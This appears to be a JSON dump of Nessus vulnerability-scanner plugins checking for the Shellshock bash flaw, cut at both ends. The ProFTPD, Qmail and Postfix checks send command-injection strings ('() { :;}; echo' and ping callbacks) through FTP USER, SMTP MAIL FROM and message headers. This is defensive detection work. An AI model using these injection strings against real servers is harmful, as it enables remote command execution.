audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nfunction ftp_open(port)\n{\n local_var encaps, soc;\n\n encaps = get_port_transport(port);\n if (encaps > ENCAPS_IP)\n {\n if (get_kb_item(\"global_settings/disable_test_ssl_based_services\"))\n exit(1, \"Not testing SSL based services per user config.\");\n soc = open_sock_ssl(port, encaps:encaps);\n }\n else soc = open_sock_tcp(port, transport:ENCAPS_IP);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n # Discard banner\n ftp_debug(str:\"custom banner\");\n ftp_recv_line(socket:soc);\n\n return soc;\n}\n\n# Attempt to get the service to echo something back to us, if the\n# 'ExecOptions sendStdout' option is set.\n\necho_injection = '() { :;}; echo \"NESSUS-e07ad3ba-$((17 + 
12))-59f8d00f4bdf\"';\necho_response = 'NESSUS-e07ad3ba-29-59f8d00f4bdf';\n\nsocket = ftp_open(port:port);\n\nsend(socket:socket, data:\"USER \" + echo_injection + '\\r\\n');\nres = recv(socket:socket, length:2000, min:2000, timeout:60);\n\nftp_close(socket:socket);\n\nif (echo_response >< res)\n{\n report = NULL;\n if (report_verbosity > 0)\n {\n report =\n '\\n' + 'Nessus was able to determine that the remote host is vulnerable to the ' +\n '\\n' + 'Shellshock vulnerability by evaluating a simple math equation, injected ' +\n '\\n' + 'through the ProFTPD service on port ' + port + '. The service allowed injection ' +\n '\\n' + \"via the '%U' mod_exec 'cookie'.\" +\n '\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"FTP server\", port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:31", "description": "SunOS 5.10: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 126546-06", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_126546-06.NASL", "href": "https://www.tenable.com/plugins/nessus/77913", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77913);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n 
script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Solaris 10 (sparc) : 126546-06\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Oracle Security Patch number 126546-06\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.10: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/126546-06\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"126546-06\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"126546-06\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:15", "description": "The remote host appears to be running Qmail. 
A remote attacker can exploit Qmail to execute commands via a specially crafted MAIL FROM header if the remote host has a vulnerable version of Bash. This is due to the fact that Qmail does not properly sanitize input before setting environmental variables.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that Qmail could not be used to exploit the Shellshock flaw.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Qmail Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:qmail:qmail", "cpe:/a:gnu:bash"], "id": "SHELLSHOCK_QMAIL.NASL", "href": "https://www.tenable.com/plugins/nessus/77970", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77970);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Qmail Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server allows remote command execution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running Qmail. 
A remote attacker can\nexploit Qmail to execute commands via a specially crafted MAIL FROM\nheader if the remote host has a vulnerable version of Bash. This is\ndue to the fact that Qmail does not properly sanitize input before\nsetting environmental variables.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that Qmail could\nnot be used to exploit the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:qmail:qmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Don't really care if its not qmail\nisqm = get_kb_item(\"SMTP/\"+port+\"/qmail\");\nif(isnull(isqm) || !isqm) audit(AUDIT_NOT_DETECT,\"Qmail\",port);\n\n# Don't bother if we cant open a proper port\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\nclose(soc);\n\nusers = make_list(\n \"admin\",\n \"qmail\",\n \"root\",\n \"alias\",\n \"qmail-postmaster\",\n \"qmail-abuse\",\n \"qmail-root\"\n);\ntraitor = NULL;\n\nforeach user (users)\n{\n # Open a connection. 
Skip to next user if we fail\n soc = smtp_open(port:port, helo:this_host_name());\n if (!soc) continue;\n ptrn = hexstr(rand_str(length:15));\n attk = \"() { :;}; ping -p \"+ptrn+\" -c 3 \"+this_host_name();\n\n send(socket:soc,data:'MAIL FROM: <'+attk+'>\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n # Has to be a valid user on the system, we try defaults\n send(socket:soc,data:'RCPT TO: <'+user+'@'+get_host_name()+'>\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n send(socket:soc,data:'DATA\\r\\n');\n s = smtp_recv_line(socket:soc);\n if(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n {\n close(soc);\n continue; # Next user\n }\n\n # See if we get a response\n filter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\n s = send_capture(socket:soc,data:'Subject:Vuln\\r\\n.\\r\\n',pcap_filter:filter);\n s = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n # No response, meaning we didn't get in\n if(isnull(s) || ptrn >!< s) continue; # Next user\n\n # We got in, that's good enough\n traitor = user;\n break;\n}\n\n# Couldn't get in\nif(isnull(traitor)) audit(AUDIT_LISTEN_NOT_VULN,\"Qmail\",port);\n\ntraitor = traitor+\"@\"+get_host_name();\nif(report_verbosity > 0)\n{\n report = \"Nessus was able to execute a remote command by sending a message to \"+traitor+'\\n';\n security_hole(port:port,extra:report);\n} else security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:33", "description": "SunOS 5.9_x86: bash patch. 
\n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 149080-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_149080-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77912", "sourceData": "#%NASL_MIN_LEVEL 70300\n# @DEPRECATED@\n#\n# This script has been deprecated by solaris9_x86_149080.nasl.\n#\n# Disabled on 2014/10/13.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77912);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 9 (x86) : 149080-01\");\n script_summary(english:\"Check for patch 149080-01\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing Oracle Security Patch number 149080-01\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9_x86: bash patch. 
\n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-01\");\n script_set_attribute(attribute:\"solution\", value:\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #78113 (solaris9_x86_149080.nasl) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-01\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-01\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:14", "description": "The remote host appears to be running Postfix. 
Postfix itself is not vulnerable to Shellshock; however, any bash script Postfix runs for filtering or other tasks could potentially be affected if the script exports an environmental variable from the content or headers of a message.\n\nA negative result from this plugin does not prove conclusively that the remote system is not affected by Shellshock, only that any scripts Postfix may be running do not create the conditions that are exploitable via the Shellshock flaw.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Postfix Script Remote Command Execution via Shellshock", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:postfix:postfix", "cpe:/a:gnu:bash"], "id": "SHELLSHOCK_POSTFIX_FILTERS.NASL", "href": "https://www.tenable.com/plugins/nessus/77969", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77969);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34896\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Postfix Script Remote Command Execution via Shellshock\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server uses scripts that allow remote command\nexecution via Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to 
be running Postfix. Postfix itself is not\nvulnerable to Shellshock; however, any bash script Postfix runs for\nfiltering or other tasks could potentially be affected if the script\nexports an environmental variable from the content or headers of a\nmessage.\n\nA negative result from this plugin does not prove conclusively that\nthe remote system is not affected by Shellshock, only that any scripts\nPostfix may be running do not create the conditions that are\nexploitable via the Shellshock flaw.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the referenced Bash patch or remove the Postfix scripts.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:postfix:postfix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ThoroughTests\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (! thorough_tests ) audit(AUDIT_THOROUGH);\n\nport = get_service(svc: \"smtp\", default: 25, exit_on_fail: 1);\n\n# Don't really care if its not postfix\nispf = get_kb_item(\"SMTP/\"+port+\"/postfix\");\nif(isnull(ispf) || !ispf) audit(AUDIT_NOT_DETECT,\"Postfix\",port);\n\n# Open a connection.\nsoc = smtp_open(port:port, helo:this_host_name());\nif (!soc) audit(AUDIT_SVC_FAIL,\"SMTP\",port);\n\n# The data headers we want to try this attack on\nheaders = make_list(\n \"To:\",\n \"References:\",\n \"Cc:\",\n \"Bcc:\",\n \"From:\",\n \"Subject:\",\n \"Date:\",\n \"Message-ID:\",\n \"Comments:\",\n \"Keywords:\",\n \"Resent-Date:\",\n \"Resent-From:\",\n \"Resent-Sender:\",\n \"\" # For the actual text of the email\n);\n\n# Build the attack data\nptrn = rand_str(length:10);\ndata = \"\";\nid = 0;\nforeach head (headers)\n{\n hkey = hexstr(mkbyte(id));\n data += head+\"() { :;}; ping -p \"+hkey+hexstr(ptrn)+\" -c 3 \"+this_host_name()+'\\n';\n id += 1;\n}\nptrn = hexstr(ptrn);\n\n# Do the SMTP 
boogaloo, for postfix FROM/TO have to be valid\nsend(socket:soc,data:'MAIL FROM: <>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\nsend(socket:soc,data:'RCPT TO: <nobody>\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\nsend(socket:soc,data:'DATA\\r\\n');\ns = smtp_recv_line(socket:soc);\nif(!strlen(s) || !ereg(pattern:\"^[2-3][0-9][0-9] .*\", string:s))\n{\n close(soc);\n audit(AUDIT_SVC_ERR,port);\n}\n\n# See if we get a response\nfilter = string(\"icmp and icmp[0] = 8 and src host \", get_host_ip());\ns = send_capture(socket:soc,data:data+'\\r\\n.\\r\\n',pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(s) || ptrn >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"Postfix\",port);\n\n# Figure out what let us in\nhkey = eregmatch(pattern:\"(\\d\\d)\"+ptrn,string:s);\n\n# Should never happen\nif(empty_or_null(hkey)) exit(1,\"Could not match pattern to response.\");\n\nhkey = int(getbyte(blob:hex2raw(s:hkey[1]),pos:0));\n\n# Should never happen\nif(hkey > max_index(headers)) exit(1, \"Strange header key in response.\");\n\nheader = headers[hkey];\nif(header == \"\")\n header = \"text contents\";\nelse\n header = \"'\"+str_replace(string:header, find:\":\", replace:\"\")+\"' header\";\n\nif(report_verbosity > 0)\n{\n report = 'The '+tolower(header)+' of the message was used to execute a remote command.';\n security_hole(port:port,extra:report);\n} else security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:55:42", "description": "It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted 
environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update.\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (20140926) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bash", "p-cpe:/a:fermilab:scientific_linux:bash-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bash-doc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20140926_BASH_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/77956", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77956);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Scientific Linux Security 
Update : bash on SL5.x, SL6.x i386/x86_64 (20140926) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update.\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto https://securityblog.redhat.com/2014/09/24/bash-specially\ncrafted-environment-variables-code-injection-attack/\");\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1409&L=scientific-linux-errata&T=0&P=1987\n script_set_attribute(attribute:\"see_also\", 